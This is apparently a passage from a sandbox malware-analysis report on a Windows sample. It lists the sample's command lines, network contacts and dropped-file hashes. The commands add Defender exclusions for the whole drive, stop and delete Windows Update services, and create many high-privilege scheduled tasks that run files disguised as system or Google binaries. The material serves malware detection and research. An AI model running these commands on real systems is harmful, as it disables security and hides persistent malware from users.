3AHUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVABvAHIALgBlAHgAZQAnACkAPAAjAHUAaQBzACMAPgA="
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#quz#>[System.Windows.Forms.MessageBox]::Show('Error 401: No VPS is allowed!','','OK','Error')<#fxy#>;
C:\Users\Admin\AppData\Local\Temp\ft.exe
"C:\Users\Admin\AppData\Local\Temp\ft.exe"
C:\Users\Admin\AppData\Local\Temp\Tor.exe
"C:\Users\Admin\AppData\Local\Temp\Tor.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\DriverHostCrtNet\KNpp6xs8D.vbe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\DriverHostCrtNet\unV39Cxd.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\DriverHostCrtNet\comSvc.exe
"C:\DriverHostCrtNet\comSvc.exe"
C:\Windows\SYSTEM32\cmd.exe
cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
C:\Windows\SYSTEM32\cmd.exe
cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell <#velngcggt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskEditor' /tr '''C:\Program Files\Google\Chrome\updaterload.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updaterload.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskEditor' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskEditor" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updaterload.exe' }
C:\Windows\system32\sc.exe
sc stop UsoSvc
C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 5 /tr "'C:\Users\All Users\Package Cache\{79043ED0-7ED1-4227-A5E5-04C5594D21F7}v48.108.8828\services.exe'" /f
C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Users\All Users\Package Cache\{79043ED0-7ED1-4227-A5E5-04C5594D21F7}v48.108.8828\services.exe'" /rl HIGHEST /f
C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\system32\sc.exe
sc stop wuauserv
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 13 /tr "'C:\Users\All Users\Package Cache\{79043ED0-7ED1-4227-A5E5-04C5594D21F7}v48.108.8828\services.exe'" /rl HIGHEST /f
C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 11 /tr "'C:\Program Files\Java\jre-1.8\lib\images\cursors\conhost.exe'" /f
C:\Windows\system32\sc.exe
sc stop bits
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files\Java\jre-1.8\lib\images\cursors\conhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 12 /tr "'C:\Program Files\Java\jre-1.8\lib\images\cursors\conhost.exe'" /rl HIGHEST /f
C:\Windows\system32\sc.exe
sc stop dosvc
C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 13 /tr "'C:\DriverHostCrtNet\StartMenuExperienceHost.exe'" /f
C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\DriverHostCrtNet\StartMenuExperienceHost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 12 /tr "'C:\DriverHostCrtNet\StartMenuExperienceHost.exe'" /rl HIGHEST /f
C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\OfficeClickToRun.exe'" /f
C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\OfficeClickToRun.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 9 /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\OfficeClickToRun.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 9 /tr "'C:\Users\Admin\OfficeClickToRun.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\Users\Admin\OfficeClickToRun.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 14 /tr "'C:\Users\Admin\OfficeClickToRun.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 6 /tr "'C:\Windows\Web\RuntimeBroker.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Windows\Web\RuntimeBroker.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 13 /tr "'C:\Windows\Web\RuntimeBroker.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 13 /tr "'C:\DriverHostCrtNet\System.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\DriverHostCrtNet\System.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 9 /tr "'C:\DriverHostCrtNet\System.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Google\Update\1.3.36.371\System.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Program Files (x86)\Google\Update\1.3.36.371\System.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Google\Update\1.3.36.371\System.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 12 /tr "'C:\Recovery\WindowsRE\backgroundTaskHost.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "backgroundTaskHost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\backgroundTaskHost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 13 /tr "'C:\Recovery\WindowsRE\backgroundTaskHost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Google\Temp\winlogon.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Program Files (x86)\Google\Temp\winlogon.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Google\Temp\winlogon.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 7 /tr "'C:\Recovery\WindowsRE\SearchApp.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SearchApp" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\SearchApp.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 8 /tr "'C:\Recovery\WindowsRE\SearchApp.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 13 /tr "'C:\Users\Default User\unsecapp.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "unsecapp" /sc ONLOGON /tr "'C:\Users\Default User\unsecapp.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 7 /tr "'C:\Users\Default User\unsecapp.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 12 /tr "'C:\Program Files\Windows Multimedia Platform\lsass.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Program Files\Windows Multimedia Platform\lsass.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 11 /tr "'C:\Program Files\Windows Multimedia Platform\lsass.exe'" /rl HIGHEST /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/DriverHostCrtNet/'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
C:\DriverHostCrtNet\System.exe
"C:\DriverHostCrtNet\System.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\41a9a8e6-06e8-42ac-bf79-d2643ae41989.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\09dcb6ba-2fbe-4e02-acba-0a7b176ef713.vbs"
C:\DriverHostCrtNet\System.exe
C:\DriverHostCrtNet\System.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | bitbucket.org | udp |
| GB | 185.166.141.8:443 | bitbucket.org | tcp |
| US | 8.8.8.8:53 | 8.141.166.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 13.107.21.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 72.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.21.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| PL | 95.214.53.31:80 | 95.214.53.31 | tcp |
| US | 8.8.8.8:53 | 31.53.214.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 147.142.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 10.27.171.150.in-addr.arpa | udp |
Files
memory/4304-0-0x00007FF8334D3000-0x00007FF8334D5000-memory.dmp
memory/4304-1-0x0000000000B80000-0x0000000000BAE000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qoxjkbk4.f15.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1664-12-0x0000022EE1350000-0x0000022EE1372000-memory.dmp
memory/1664-13-0x00007FF8334D0000-0x00007FF833F91000-memory.dmp
memory/1664-14-0x00007FF8334D0000-0x00007FF833F91000-memory.dmp
memory/1664-15-0x00007FF8334D0000-0x00007FF833F91000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\ft.exe
| MD5 | e84cc0620cc96970d2e1a8d0017000a6 |
| SHA1 | 3e06e2f55642880f6b3738f462a60bc4d84f68ba |
| SHA256 | 17df34146d3c1442f4b303e9536dd207424eb4d07d90a54f8b4cef20f40d43a8 |
| SHA512 | d902fa5eed92eafc6f11f2a5d3e49020948e6c152d5c34a09c6d42b47ec2319da4ee5f63f38dd658da3f846e9495ad93ae3f9cfa834d827a59e9bc3ce5bd10f0 |
C:\Users\Admin\AppData\Local\Temp\Tor.exe
| MD5 | e235a410c3e0c9432f755940e7d5ac61 |
| SHA1 | b94f875771c83acbcdcd3c788dc8002eaf91438f |
| SHA256 | a77e85defe720361ffa22bc96fe3c82366c3ef61dd931bdf0e0326aa984a33b3 |
| SHA512 | 6d3c3650441b48e37ca1352d9f38a66a6376741439db8efc9f765de5df7506400e5ea5174d28734e2876889f242bc9ab7e8e5013c18575b5ccb7493bd8e2b33f |
memory/1664-41-0x00007FF8334D0000-0x00007FF833F91000-memory.dmp
C:\DriverHostCrtNet\KNpp6xs8D.vbe
| MD5 | a9feb4bb422aae9305d1c9d7c223dce5 |
| SHA1 | a4e983d8f1b7b21b9edc1fbbe358ea67dc38cf37 |
| SHA256 | 22851b07f5b85a7cd0992b1593b973b9e29af03733dd0a86284f0c759bbc2201 |
| SHA512 | da6a69df2fc09304c97979b51027971636328f01bd69dcab955395acf64e1f0c6c9a6aa9fe77d4d53f7fd16146acd332650f3d00cfd8664b6304ef719cbe4255 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | e1d7973fb9071815b4241da5ec0dfb6a |
| SHA1 | 41f06afbd0ac9f9a0b226a2dd6fa9495d83209b9 |
| SHA256 | b3953ac9f5752d996ec2545864d6ccf09ffe4b0f84f41a2cc52a95ad8103212b |
| SHA512 | 66163114aba8867561ceac2124bc2060c351cb4a83c4f8d40bc6bfd8042881690ea8152e2b58ec55b4b6de17e1610642c90df602e1fb2658b4c3d0783f3a0900 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 223bd4ae02766ddc32e6145fd1a29301 |
| SHA1 | 900cfd6526d7e33fb4039a1cc2790ea049bc2c5b |
| SHA256 | 1022ec2fed08ff473817fc53893e192a8e33e6a16f3d2c8cb6fd37f49c938e1e |
| SHA512 | 648cd3f8a89a18128d2b1bf960835e087a74cdbc783dbfcc712b3cb9e3a2e4f715e534ba2ef81d89af8f60d4882f6859373248c875ceb26ad0922e891f2e74cc |
C:\DriverHostCrtNet\unV39Cxd.bat
| MD5 | 39e72d40a9ddaaf86994f941af3f7465 |
| SHA1 | e4b7c6d895cb2ce60391ab1a4363425868b63204 |
| SHA256 | 4482b48de5d1a8c39b59f5293ddc7bbcba2af31ff77ebc02e48b68c6a68b0fae |
| SHA512 | beb0761aaca17016bd7def46956b006f201885f24b1ecce29e75b65199f9196a3cb2461b79734e49f8a2328647f3ae2e741b8afb52d7857d429b0a7b0ef0f4a1 |
C:\DriverHostCrtNet\comSvc.exe
| MD5 | 08278eef0c4511e2cbfce76266dd90f2 |
| SHA1 | 9dd9dee2b7b3b19a6e8271ee443b79bb64eb288b |
| SHA256 | f9313b93b7c392002e914e4e6af21eb8f5e25f86c37803c64e84ae8d228f2f03 |
| SHA512 | 3e5fb401eafb8ddce42fd9bbbd23783941d7540e20edba98fe67e05871d72ac8c89e5a8a5254bc9db62cc74fae596b3c86785650e075e8a1d5b25651d90cadd0 |
memory/4404-67-0x0000000000150000-0x0000000000306000-memory.dmp
memory/4404-69-0x000000001AF30000-0x000000001AF4C000-memory.dmp
memory/4404-70-0x000000001AFA0000-0x000000001AFF0000-memory.dmp
memory/4404-74-0x000000001AF50000-0x000000001AF66000-memory.dmp
memory/4404-75-0x000000001AF70000-0x000000001AF82000-memory.dmp
memory/4404-73-0x0000000002540000-0x0000000002550000-memory.dmp
memory/4404-72-0x0000000002420000-0x0000000002428000-memory.dmp
memory/4404-77-0x000000001AF90000-0x000000001AFA0000-memory.dmp
memory/4404-78-0x000000001AF80000-0x000000001AF8C000-memory.dmp
memory/4404-82-0x000000001B710000-0x000000001B71C000-memory.dmp
C:\Windows\System32\drivers\etc\hosts
| MD5 | 7a47afdf68d97d678987c9d60eab9086 |
| SHA1 | 1e03088721b6c7d0aab59e80f12238837793f051 |
| SHA256 | 860d78899a84ae7c858183ff0eab215ee0f36febfdfd766a2fb6d429895da669 |
| SHA512 | 9dc0cbcefc921689582ed163c767c7c0b681236d499cf962ade0415a2b0fcd7d501e682a0ea3c385f7d039d3de94bb0b40c001851b1dd4c0d05c7fb26b65881c |
memory/4404-79-0x000000001B700000-0x000000001B708000-memory.dmp
memory/4404-86-0x000000001B950000-0x000000001B95C000-memory.dmp
memory/4404-87-0x000000001B960000-0x000000001B96C000-memory.dmp
memory/4404-85-0x000000001B840000-0x000000001B848000-memory.dmp
memory/4404-84-0x000000001B830000-0x000000001B83A000-memory.dmp
memory/4404-83-0x000000001B820000-0x000000001B82C000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 4cb59d549e8c5d613ea4b7524088528a |
| SHA1 | 5bdfb9bc4920177a9e5d4b9c93df65383353ab22 |
| SHA256 | a4ac74b80eadcb876402dc2842d706a249691176dd838a6100a8c26bfa87811a |
| SHA512 | a9f5bde138142665e056b1e2f40c16cff0c9a6a6907f038c4685275df66ceea39d9fca9a1c72529b2287632e0669346efb06ff302b0199764cca45b23faa4b52 |
memory/4876-115-0x00007FF61D540000-0x00007FF61D944000-memory.dmp
C:\Program Files\Java\jre-1.8\lib\images\cursors\RCXE600.tmp
| MD5 | dbfa087e264beffa3a0247b3a5989aa5 |
| SHA1 | f1fc7b83a480cc49d17d7a91f92e2bef54ae4048 |
| SHA256 | 5d59ce562d799c6e0ce33d30ad5095c7432cd71ce66f4594377e28ae3a031533 |
| SHA512 | 198b3cab56b8c38d4bac0b4fcb7e995e7a4eaf64432a35f268a6d135ffe91d3dd2fcd3c1f0b7d38b993dc5aacc0c07d70c21a46d7dfcd4ecc1b96bcfba80dda2 |
C:\DriverHostCrtNet\System.exe
| MD5 | 19fc528bbada6d55a39b464c300a110e |
| SHA1 | 4016abebf8f049737e2091dd743c15ff3fa96a73 |
| SHA256 | fd5275c55a974d4078eb7de59aa72ce412ac8bcb6c8249b213fea1e0df329d0f |
| SHA512 | 41ae828bde4fe58fc970cf281b866f9bb4cf2ec1e2e835505ec65b041e134bd9adf9977fe85837a0921668c2cd8fe9fedd30b208c986b51e99c4864c33f02d03 |
C:\Program Files (x86)\Google\Update\1.3.36.371\RCXF4C0.tmp
| MD5 | db580349ff4238ccf1b33aac144c28ed |
| SHA1 | 2c97445c6c90307879e606da60a9bdcfac9d0a1f |
| SHA256 | fd94d60527fc981979b222e23e368131e5e1d21cbb53fd71aa67684a308eb46f |
| SHA512 | e8f1fe0dc62c7061ea2fd8f152a6347b882185a738e31883eb75fe140230b7f64bd9d51ed9af8df2850077c540579430b761f9b00f7645fc4364d9c09127b711 |
C:\Program Files (x86)\Google\Temp\winlogon.exe
| MD5 | 140ab2669f87f619d65359606c22f762 |
| SHA1 | 021da66ad7962c4ac2ff0a05f0f424d1488a6efe |
| SHA256 | 230b332f94351c501872b63e997a5f3a458e6f914835e85bfbf92ee7b1caad8b |
| SHA512 | 4bd5602f850c4b33729a4789fa4540d601e76d9608da0fed16fa6b2573981ea87342f93f2c57aa145ecd63ccfe912c960eb245eb34833f3809892ac07c94857b |
C:\Program Files\Windows Multimedia Platform\lsass.exe
| MD5 | e3c6c535f8752fd171107b16aeea7e17 |
| SHA1 | 32acd7d8666b85ae37f3d0e49a68bead46f5e81c |
| SHA256 | a1ee8260f0ddb99fd706b31df2d201373b0e938c292eb8b02c56ada04d3d14fd |
| SHA512 | 5516a4ae426ac4fa1654e83bf2255c7d94061aec51ca89c479796777d3633cf93536072e6c028afe1e9dc8e0aa6f447b3bee4d602835d2216b988e016e66e717 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 5b9a7ee9a9286faef39bbe9cac042fd4 |
| SHA1 | cb3ef3c9e19781c45ffd9e2902e5b0ed38c0e2c3 |
| SHA256 | a6d5d07c333b6a68534ebc0ee23ea49e77a67f26597e4bd5bcc8dfd216e6a348 |
| SHA512 | ea14a4932134952864bd1b0ccdfd6ad45ed650a9bc52589f6d21fc4382a6237c6bbce1c016482b4a68cd609dadea234726927ba0f26e9443a6b970209281f450 |
memory/3320-450-0x0000000000440000-0x00000000005F6000-memory.dmp
memory/3320-451-0x000000001B170000-0x000000001B182000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\41a9a8e6-06e8-42ac-bf79-d2643ae41989.vbs
| MD5 | d5fd9d27d73330bf57ded1888870d647 |
| SHA1 | 8a97cd2488b3e6a3c630fd38de221f3a399d36b4 |
| SHA256 | 8b2b064865036539bbcc1f94caaa6f9eb94b81cc9589e06b55cd19ae8c4e00df |
| SHA512 | dfaa890f12484ebc19e4956bf7d0eff449f42da756392095721307288c24b438655b81ee6cc5d7f9cccf5ed1958e9d59ba5c56bd490fb380b300be3516b1ef86 |
C:\Users\Admin\AppData\Local\Temp\09dcb6ba-2fbe-4e02-acba-0a7b176ef713.vbs
| MD5 | 68a095c7021a6ccc4d3a17d93f9e86bd |
| SHA1 | 0f6ea77ee95e3bba5a67a266d2f2e2a6df9bc3ce |
| SHA256 | 4744ed0a3de93248e8a4c3ce9e8f133387a8ccf437c5b57bb18dd99723f1b4f5 |
| SHA512 | b33abc8b188040b6c89c3f2310a20d0980cf08bbf2c5a479a82af39cf52119525d3fbcba2ca7ea2193bff35655f2cfdf5211fa6cd79624912876ed918e186f28 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | cadef9abd087803c630df65264a6c81c |
| SHA1 | babbf3636c347c8727c35f3eef2ee643dbcc4bd2 |
| SHA256 | cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438 |
| SHA512 | 7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 2e907f77659a6601fcc408274894da2e |
| SHA1 | 9f5b72abef1cd7145bf37547cdb1b9254b4efe9d |
| SHA256 | 385da35673330e21ac02545220552fe301fe54dedefbdafc097ac4342a295233 |
| SHA512 | 34fa0fff24f6550f55f828541aaefe5d75c86f8f0842d54b50065e9746f9662bb7209c74c9a9571540b9855bb3851f01db613190024e89b198d485bb5dc07721 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | bd5940f08d0be56e65e5f2aaf47c538e |
| SHA1 | d7e31b87866e5e383ab5499da64aba50f03e8443 |
| SHA256 | 2d2f364c75bd2897504249f42cdf1d19374f5230aad68fa9154ea3d03e3031a6 |
| SHA512 | c34d10c7e07da44a180fae9889b61f08903aa84e8ddfa80c31c272b1ef9d491b8cec6b8a4c836c3cb1583fe8f4955c6a8db872515de3a9e10eae09610c959406 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | e243a38635ff9a06c87c2a61a2200656 |
| SHA1 | ecd95ed5bf1a9fbe96a8448fc2814a0210fa2afc |
| SHA256 | af5782703f3f2d5a29fb313dae6680a64134db26064d4a321a3f23b75f6ca00f |
| SHA512 | 4418957a1b10eee44cf270c81816ae707352411c4f5ac14b6b61ab537c91480e24e0a0a2c276a6291081b4984c123cf673a45dcedb0ceeef682054ba0fc19cb4 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | e8ce785f8ccc6d202d56fefc59764945 |
| SHA1 | ca032c62ddc5e0f26d84eff9895eb87f14e15960 |
| SHA256 | d85c19fc6b9d25e2168a2cc50ff38bd226fbf4f02aa7ac038a5f319522d2ffa4 |
| SHA512 | 66460aec4afee582556270f8ee6048d130a090f1c12a2632ed71a99a4073e9931e9e1cc286e32debffb95a90bd955f0f0d6ec891b1c5cd2f0aae41eb6d25832f |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\System.exe.log
| MD5 | 3ad9a5252966a3ab5b1b3222424717be |
| SHA1 | 5397522c86c74ddbfb2585b9613c794f4b4c3410 |
| SHA256 | 27525f5fc7871c6828ab5173315e95b5c7e918d2ee532781c562c378584b5249 |
| SHA512 | b1a745f7a0f33b777ffc34f74f42752144d9f2d06b8bc613e703570494762b3af87e153212c3274b18af14f17b8619e2f350b7c3cc11228f7d4208d4251e90e6 |
memory/5280-487-0x0000000001970000-0x0000000001982000-memory.dmp